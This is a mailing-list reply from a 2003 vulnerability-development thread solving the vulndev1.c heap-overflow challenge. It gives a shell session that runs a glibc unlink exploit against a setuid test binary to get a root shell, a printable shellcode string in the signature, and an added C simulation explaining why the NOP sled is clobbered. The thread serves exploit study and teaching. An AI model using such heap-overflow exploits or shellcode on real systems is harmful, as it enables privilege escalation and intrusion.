Vulnerability Development mailing list archives
Re: vulndev1.c solution (warning SPOILER)
From: Kenji Cronos <matrix () phiral com>
Date: Thu, 15 May 2003 09:35:27 -0700
On Wed, 14 May 2003 16:48:33 -0700 "Cameron Brown" <cameron () greyzone com> wrote:
Jon, I don't know about yours, but my version of free() (glibc-2.2.93) trashes bytes 8-12 of the NOP sled as a side effect of the bogus unlink. If I execute this trash, it acts like a call into bad memory and I segfault. Fortunately, I found I can avoid this by adding a 12 byte jump ("\xeb\x0c") at the front of the NOP sled. Just thought it was worth mentioning.
Yup, you're right.. I tried doing the same thing on a different system and ran into that problem.. had to put a jump in there.. I guess I just got lucky on my laptop the first time.. also, when exploiting on the command line.. \x0c can screw things up since it's the form feed character.. so here I just jumped over a little bit more..

matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c
matrix@overdose vuln-dev $ sudo chown root.root vuln1
matrix@overdose vuln-dev $ sudo chmod +s vuln1
matrix@overdose vuln-dev $ export SMEGMA=`printf "\xeb\x0e"`AAAAAAAAAAAAAAAAAA`cat shell`
matrix@overdose vuln-dev $ echo 'main(){printf("%p\n",getenv("SMEGMA"));}'>q.c;gcc -o q.ert q.c;./q.ert;rm q.*
0xbffffa04
matrix@overdose vuln-dev $ objdump -R ./vuln1 | grep free
080495f8 R_386_JUMP_SLOT   free
matrix@overdose vuln-dev $ pcalc 0xf8-12
        236             0xec            0y11101100
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x253;'` `printf "\xec\x95\x04\x08\x04\xfa\xff\xbf";`
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b#

-- 
%JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXqv-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ-yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPPPPPPPPPPPPPPPPPPPPP
Attachment: _bin
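The clobbering Cameron and Kenji are working around falls straight out of the old glibc unlink() macro. free() on the faked chunk does FD->bk = BK (the GOT write, which is why fd is set to GOT(free) - 12) and then BK->fd = FD; since BK is the address of the env string, that second store lands a dword at sled+8, so a bare NOP sled executes the pointer 0x080495ec as code. The program below is an added example, not code from the thread or from the vulndev1.c challenge: it replays the pre safe-unlink macro on a small flat 32-bit memory image with made-up addresses (ENV_ADDR, CHUNK_ADDR and GOT_FREE are assumptions standing in for 0xbffffa04, the freed chunk and 0x080495f8) and shows that a "\xeb\x0e" at the front hops over the trashed dword while the plain sled runs into it.

```c
/* Added example: simulate glibc's pre-"safe unlink" macro on a faked
 * chunk.  Addresses live in a flat 32-bit image (addr == offset) so the
 * i386 chunk layout from the thread is reproduced on any host. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MEM_SIZE   0x200
static uint8_t mem[MEM_SIZE];   /* pretend address space */

/* Constructed addresses inside the image (assumptions, not the real ones) */
#define ENV_ADDR   0x010        /* where the SMEGMA env string would sit   */
#define CHUNK_ADDR 0x100        /* the faked chunk handed to free()        */
#define GOT_FREE   0x1f0        /* stand-in for the R_386_JUMP_SLOT of free */

static uint32_t rd32(uint32_t a) { uint32_t v; memcpy(&v, mem + a, 4); return v; }
static void     wr32(uint32_t a, uint32_t v) { memcpy(mem + a, &v, 4); }

/* The old macro:  FD = P->fd; BK = P->bk; FD->bk = BK; BK->fd = FD;
 * In a 32-bit malloc chunk fd sits at +8 and bk at +12. */
static void unlink_sim(uint32_t p)
{
    uint32_t fd = rd32(p + 8);
    uint32_t bk = rd32(p + 12);
    wr32(fd + 12, bk);   /* FD->bk = BK : the GOT overwrite we want        */
    wr32(bk + 8, fd);    /* BK->fd = FD : the dword trashed at sled + 8    */
}

/* Env string: optional "\xeb\x0e" short jump, a NOP sled, then one
 * marker byte (0xcc) standing in for the first shellcode instruction. */
static void build_env(int with_jump)
{
    memset(mem + ENV_ADDR, 0x90, 0x40);
    if (with_jump) { mem[ENV_ADDR] = 0xeb; mem[ENV_ADDR + 1] = 0x0e; }
    mem[ENV_ADDR + 0x40] = 0xcc;
}

/* Same fake chunk the exploit string builds: fd = GOT(free) - 12,
 * bk = address of the sled. */
static void build_fake_chunk(void)
{
    wr32(CHUNK_ADDR + 8,  GOT_FREE - 12);
    wr32(CHUNK_ADDR + 12, ENV_ADDR);
}

/* Destination of a "jmp rel8" encoded at address `at`. */
static uint32_t short_jmp_target(uint32_t at)
{
    return at + 2 + (int8_t)mem[at + 1];
}

/* Build everything, run the unlink, then "execute" the sled: follow a
 * leading short jump if present and walk NOPs until the marker.
 * Returns 1 if only NOPs lie on the path to the shellcode, 0 if the
 * walk hits a byte the unlink clobbered. */
static int simulate(int with_jump)
{
    memset(mem, 0, sizeof mem);
    build_env(with_jump);
    build_fake_chunk();
    unlink_sim(CHUNK_ADDR);

    uint32_t pc = ENV_ADDR;
    if (mem[pc] == 0xeb)
        pc = short_jmp_target(pc);
    for (; pc <= ENV_ADDR + 0x40; pc++) {
        if (mem[pc] == 0xcc) return 1;     /* reached the shellcode cleanly */
        if (mem[pc] != 0x90) return 0;     /* ran into the trashed dword    */
    }
    return 0;
}

static uint32_t got_free_value(void)     { return rd32(GOT_FREE); }
static uint32_t clobbered_fd_value(void) { return rd32(ENV_ADDR + 8); }

int main(void)
{
    printf("plain sled : %s\n", simulate(0) ? "clean" : "executes clobbered dword");
    printf("with jmp   : %s\n", simulate(1) ? "clean" : "executes clobbered dword");
    printf("GOT(free) -> 0x%03x, sled+8 now holds 0x%03x (GOT(free) - 12)\n",
           got_free_value(), clobbered_fd_value());
    return 0;
}
```

Build with `gcc -o unlink_sim unlink_sim.c && ./unlink_sim`. The jump lands at sled+16, comfortably past the four clobbered bytes at sled+8..11; Cameron's "\xeb\x0c" lands at sled+14 and works for the same reason, the only difference being Kenji's point that 0x0c is a form feed and is awkward to pass on a command line.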
Current thread:
- Re: partial analysis of vulndev-1.c, (continued)
- Re: partial analysis of vulndev-1.c andrewg (May 13)
- Re: Administrivia: List Announcement Mr. Rufus Faloofus (May 13)
- RE: Administrivia: List Announcement Cameron Brown (May 13)
- RE: Administrivia: List Announcement Shafik Yaghmour (May 13)
- RE: Administrivia: List Announcement Cameron Brown (May 13)
- RE: Administrivia: List Announcement andrewg (May 13)
- RE: Administrivia: List Announcement Shafik Yaghmour (May 13)
- Re: vulndev1.c solution (warning SPOILER) Jose Ronnick (May 13)
- RE: vulndev1.c solution (warning SPOILER) Cameron Brown (May 14)
- Re: vulndev1.c solution (warning SPOILER) Jon Erickson (May 14)
- RE: vulndev1.c solution (warning SPOILER) Cameron Brown (May 15)
- Re: vulndev1.c solution (warning SPOILER) Kenji Cronos (May 15)
- Re: vulndev-1 exploit. Joel Eriksson (May 14)
- Re: vulndev-1 exploit. Joel Eriksson (May 14)
- Re: Administrivia: List Announcement xenophi1e (May 13)
- Re: Administrivia: List Announcement Shafik Yaghmour (May 13)
- RE: Administrivia: List Announcement Oliver Lavery (May 13)
- RE: Administrivia: List Announcement Gustavo Scotti (May 13)
- RE: Administrivia: List Announcement Oliver Lavery (May 13)
- Re: Administrivia: List Announcement Eric Haugh (May 13)
- Re: Administrivia: List Announcement Nexus (May 13)
- Re: Administrivia: List Announcement Shafik Yaghmour (May 13)
- Re: Administrivia: List Announcement Thiago Canozzo Lahr (May 13)